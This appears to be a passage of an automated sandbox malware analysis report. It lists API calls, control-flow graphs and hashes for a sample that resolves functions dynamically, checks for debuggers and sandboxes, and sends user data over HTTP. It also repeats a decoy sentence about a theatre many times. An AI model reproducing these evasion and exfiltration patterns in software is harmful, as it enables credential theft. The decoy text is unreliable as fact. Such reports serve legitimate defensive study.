                                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 007346BC
                                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 007346C7
                                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 007346D2
                                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 007346DD
                                                            • strlen.MSVCRT ref: 007346F0
                                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00734718
                                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00734723
                                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0073472E
                                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00734739
                                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00734744
                                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00734754
                                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0073475F
                                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0073476A
                                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00734775
                                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00734780
                                                            • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 0073479C
                                                            Strings
                                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00734622
                                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00734678
                                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007346AC
                                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0073471E
                                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00734765
                                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0073477B
                                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00734617
                                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00734638
                                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007346CD
                                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00734657
                                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007346B7
                                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007345E8
                                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0073475A
                                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00734643
                                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00734713
                                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00734683
                                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007346C2
                                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0073474F
                                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007345C7
                                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007345D2
                                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007345F3
                                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00734734
                                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0073466D
                                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007346D8
                                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007345DD
                                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00734662
                                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00734770
                                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00734729
                                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0073473F
                                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0073462D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                            • Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: lstrlen$Heap$AllocateProcessProtectVirtualstrlen
                                                            • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                                                            • API String ID: 2127927946-2218711628
                                                            • Opcode ID: a0cea679af5976d908c0900f6283294c39538746475e892664c668552f6b5400
                                                            • Instruction ID: 6bf1d1b796161a3ae56b3c09243b2e57810d7610e3b3fab1c0242dae6edb3c9d
                                                            • Opcode Fuzzy Hash: a0cea679af5976d908c0900f6283294c39538746475e892664c668552f6b5400
                                                            • Instruction Fuzzy Hash: 534112B9640644EBC7189FE4EC9D99CBB70BB4A723B60C082F922851B0D7FD9505DB39

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 665 749860-749874 call 749750 668 749a93-749af2 LoadLibraryA * 5 665->668 669 74987a-749a8e call 749780 GetProcAddress * 21 665->669 671 749af4-749b08 GetProcAddress 668->671 672 749b0d-749b14 668->672 669->668 671->672 674 749b46-749b4d 672->674 675 749b16-749b41 GetProcAddress * 2 672->675 676 749b4f-749b63 GetProcAddress 674->676 677 749b68-749b6f 674->677 675->674 676->677 678 749b71-749b84 GetProcAddress 677->678 679 749b89-749b90 677->679 678->679 680 749bc1-749bc2 679->680 681 749b92-749bbc GetProcAddress * 2 679->681 681->680
                                                            APIs
                                                            • GetProcAddress.KERNEL32(76210000,00FC2CB0), ref: 007498A1
                                                            • GetProcAddress.KERNEL32(76210000,00FC2DA0), ref: 007498BA
                                                            • GetProcAddress.KERNEL32(76210000,00FC2B78), ref: 007498D2
                                                            • GetProcAddress.KERNEL32(76210000,00FC2DE8), ref: 007498EA
                                                            • GetProcAddress.KERNEL32(76210000,00FC2D28), ref: 00749903
                                                            • GetProcAddress.KERNEL32(76210000,00FC1538), ref: 0074991B
                                                            • GetProcAddress.KERNEL32(76210000,00FBAC68), ref: 00749933
                                                            • GetProcAddress.KERNEL32(76210000,00FBACE8), ref: 0074994C
                                                            • GetProcAddress.KERNEL32(76210000,00FC2CE0), ref: 00749964
                                                            • GetProcAddress.KERNEL32(76210000,00FC2D40), ref: 0074997C
                                                            • GetProcAddress.KERNEL32(76210000,00FC2C08), ref: 00749995
                                                            • GetProcAddress.KERNEL32(76210000,00FC2B48), ref: 007499AD
                                                            • GetProcAddress.KERNEL32(76210000,00FBAD28), ref: 007499C5
                                                            • GetProcAddress.KERNEL32(76210000,00FC2BD8), ref: 007499DE
                                                            • GetProcAddress.KERNEL32(76210000,00FC2D70), ref: 007499F6
                                                            • GetProcAddress.KERNEL32(76210000,00FBAD48), ref: 00749A0E
                                                            • GetProcAddress.KERNEL32(76210000,00FC2BF0), ref: 00749A27
                                                            • GetProcAddress.KERNEL32(76210000,00FC2C68), ref: 00749A3F
                                                            • GetProcAddress.KERNEL32(76210000,00FBAD68), ref: 00749A57
                                                            • GetProcAddress.KERNEL32(76210000,00FC2E30), ref: 00749A70
                                                            • GetProcAddress.KERNEL32(76210000,00FBAD88), ref: 00749A88
                                                            • LoadLibraryA.KERNEL32(00FC2E78,?,00746A00), ref: 00749A9A
                                                            • LoadLibraryA.KERNEL32(00FC2E18,?,00746A00), ref: 00749AAB
                                                            • LoadLibraryA.KERNEL32(00FC2E60,?,00746A00), ref: 00749ABD
                                                            • LoadLibraryA.KERNEL32(00FC2E90,?,00746A00), ref: 00749ACF
                                                            • LoadLibraryA.KERNEL32(00FC2E48,?,00746A00), ref: 00749AE0
                                                            • GetProcAddress.KERNEL32(75B30000,00FC2EA8), ref: 00749B02
                                                            • GetProcAddress.KERNEL32(751E0000,00FC2EC0), ref: 00749B23
                                                            • GetProcAddress.KERNEL32(751E0000,00FC2E00), ref: 00749B3B
                                                            • GetProcAddress.KERNEL32(76910000,00FC3B28), ref: 00749B5D
                                                            • GetProcAddress.KERNEL32(75670000,00FBADA8), ref: 00749B7E
                                                            • GetProcAddress.KERNEL32(77310000,00FC1548), ref: 00749B9F
                                                            • GetProcAddress.KERNEL32(77310000,NtQueryInformationProcess), ref: 00749BB6
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                            • Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AddressProc$LibraryLoad
                                                            • String ID: Fs$NtQueryInformationProcess
                                                            • API String ID: 2238633743-1241331114
                                                            • Opcode ID: 16f3a19a90fe5e752a9d1c44e1e979b3cf32036954799e9b25c7340cc4a75a35
                                                            • Instruction ID: 6383a1bc5514ee6f439ef5f8b09a4e6b0de778a4e1fd888e881c067a08f67548
                                                            • Opcode Fuzzy Hash: 16f3a19a90fe5e752a9d1c44e1e979b3cf32036954799e9b25c7340cc4a75a35
                                                            • Instruction Fuzzy Hash: 8DA12DB792C2409FD348DFA8ED8999E37F9F7C8701B04451AA61D83264E73998C1EB53

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 769 734880-734942 call 74a7a0 call 7347b0 call 74a740 * 5 InternetOpenA StrCmpCA 784 734944 769->784 785 73494b-73494f 769->785 784->785 786 734955-734acd call 748b60 call 74a920 call 74a8a0 call 74a800 * 2 call 74a9b0 call 74a8a0 call 74a800 call 74a9b0 call 74a8a0 call 74a800 call 74a920 call 74a8a0 call 74a800 call 74a9b0 call 74a8a0 call 74a800 call 74a9b0 call 74a8a0 call 74a800 call 74a9b0 call 74a920 call 74a8a0 call 74a800 * 2 InternetConnectA 785->786 787 734ecb-734ef3 InternetCloseHandle call 74aad0 call 739ac0 785->787 786->787 873 734ad3-734ad7 786->873 797 734f32-734fa2 call 748990 * 2 call 74a7a0 call 74a800 * 8 787->797 798 734ef5-734f2d call 74a820 call 74a9b0 call 74a8a0 call 74a800 787->798 798->797 874 734ae5 873->874 875 734ad9-734ae3 873->875 876 734aef-734b22 HttpOpenRequestA 874->876 875->876 877 734b28-734e28 call 74a9b0 call 74a8a0 call 74a800 call 74a920 call 74a8a0 call 74a800 call 74a9b0 call 74a8a0 call 74a800 call 74a9b0 call 74a8a0 call 74a800 call 74a9b0 call 74a8a0 call 74a800 call 74a9b0 call 74a8a0 call 74a800 call 74a920 call 74a8a0 call 74a800 call 74a9b0 call 74a8a0 call 74a800 call 74a9b0 call 74a8a0 call 74a800 call 74a920 call 74a8a0 call 74a800 call 74a9b0 call 74a8a0 call 74a800 call 74a9b0 call 74a8a0 call 74a800 call 74a9b0 call 74a8a0 call 74a800 call 74a9b0 call 74a8a0 call 74a800 call 74a920 call 74a8a0 call 74a800 call 74a740 call 74a920 * 2 call 74a8a0 call 74a800 * 2 call 74aad0 lstrlenA call 74aad0 * 2 lstrlenA call 74aad0 HttpSendRequestA 876->877 878 734ebe-734ec5 InternetCloseHandle 876->878 989 734e32-734e5c InternetReadFile 877->989 878->787 990 734e67-734eb9 InternetCloseHandle call 74a800 989->990 991 734e5e-734e65 989->991 990->878 991->990 992 734e69-734ea7 call 74a9b0 call 74a8a0 call 74a800 991->992 992->989
                                                            APIs
                                                              • Part of subcall function 0074A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0074A7E6
                                                              • Part of subcall function 007347B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 007347EA
                                                              • Part of subcall function 007347B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00734801
                                                              • Part of subcall function 007347B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00734818
                                                              • Part of subcall function 007347B0: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00734839
                                                              • Part of subcall function 007347B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00734849
                                                              • Part of subcall function 0074A740: lstrcpy.KERNEL32(u,00000000), ref: 0074A788
                                                            • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00734915
                                                            • StrCmpCA.SHLWAPI(?,00FCD800), ref: 0073493A
                                                            • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00734ABA
                                                            • lstrlenA.KERNEL32(00000000,00000000,?,?,?,?,00750DDB,00000000,?,?,00000000,?,",00000000,?,00FCD830), ref: 00734DE8
                                                            • lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00734E04
                                                            • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00734E18
                                                            • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00734E49
                                                            • InternetCloseHandle.WININET(00000000), ref: 00734EAD
                                                            • InternetCloseHandle.WININET(00000000), ref: 00734EC5
                                                            • HttpOpenRequestA.WININET(00000000,00FCD8E0,?,00FD18A0,00000000,00000000,00400100,00000000), ref: 00734B15
                                                              • Part of subcall function 0074A9B0: lstrlenA.KERNEL32(?,00751110,?,00000000,00750AEF), ref: 0074A9C5
                                                              • Part of subcall function 0074A9B0: lstrcpy.KERNEL32(00000000), ref: 0074AA04
                                                              • Part of subcall function 0074A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0074AA12
                                                              • Part of subcall function 0074A8A0: lstrcpy.KERNEL32(?,u), ref: 0074A905
                                                              • Part of subcall function 0074A920: lstrcpy.KERNEL32(00000000,?), ref: 0074A972
                                                              • Part of subcall function 0074A920: lstrcatA.KERNEL32(00000000), ref: 0074A982
                                                            • InternetCloseHandle.WININET(00000000), ref: 00734ECF
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                            • Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Internet$lstrcpy$lstrlen$??2@CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                                            • String ID: "$"$------$------$------
                                                            • API String ID: 2402878923-2180234286
                                                            • Opcode ID: f095ea4774a36ccd02ca9b2b330ca3f2b4ffa7230d9e38404534395df6358fd9
                                                            • Instruction ID: c3bca0b6043f1f2044c4e250e854236ff67cb1ce01e1685f9f8b79488d1efed6
                                                            • Opcode Fuzzy Hash: f095ea4774a36ccd02ca9b2b330ca3f2b4ffa7230d9e38404534395df6358fd9
                                                            • Instruction Fuzzy Hash: B712BB72950218FAEB15EB90DC96FEEB378BF54304F5141A9B10662091EF782F49CF62
                                                            APIs
                                                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,007311B7), ref: 00747880
                                                            • HeapAlloc.KERNEL32(00000000,?,?,?,007311B7), ref: 00747887
                                                            • GetUserNameA.ADVAPI32(00000104,00000104), ref: 0074789F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                            • Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Heap$AllocNameProcessUser
                                                            • String ID:
                                                            • API String ID: 1206570057-0
                                                            • Opcode ID: 216afa4244accb8a1f47522f1df92c8607f07c20e087751880ca1875272c3b3e
                                                            • Instruction ID: 0fc1000819bb2c733b4fe4b34115e5f1dd076d559b116801c8553f402dc48a1b
                                                            • Opcode Fuzzy Hash: 216afa4244accb8a1f47522f1df92c8607f07c20e087751880ca1875272c3b3e
                                                            • Instruction Fuzzy Hash: C1F044F2D44208AFC714DF94DD45BAEBBB8E744711F100159F605A2680C7781544CBA2
                                                            APIs
                                                            • GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,00746A17,00750AEF), ref: 0073116A
                                                            • ExitProcess.KERNEL32 ref: 0073117E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                            • Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ExitInfoProcessSystem
                                                            • String ID:
                                                            • API String ID: 752954902-0
                                                            • Opcode ID: 49d313d44bdc2cc21f704a16cf74ab56d5b65dbe10c873b569877466a4f9e48d
                                                            • Instruction ID: 09195dc73ec229a4b12212fc03d04d0ab56f39862070adf723894c03b26f29e3
                                                            • Opcode Fuzzy Hash: 49d313d44bdc2cc21f704a16cf74ab56d5b65dbe10c873b569877466a4f9e48d
                                                            • Instruction Fuzzy Hash: ACD05E75D0430CDBCB04DFE0D8496DDBBB8FB48312F000554D90962340EA3058C2CAA6

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
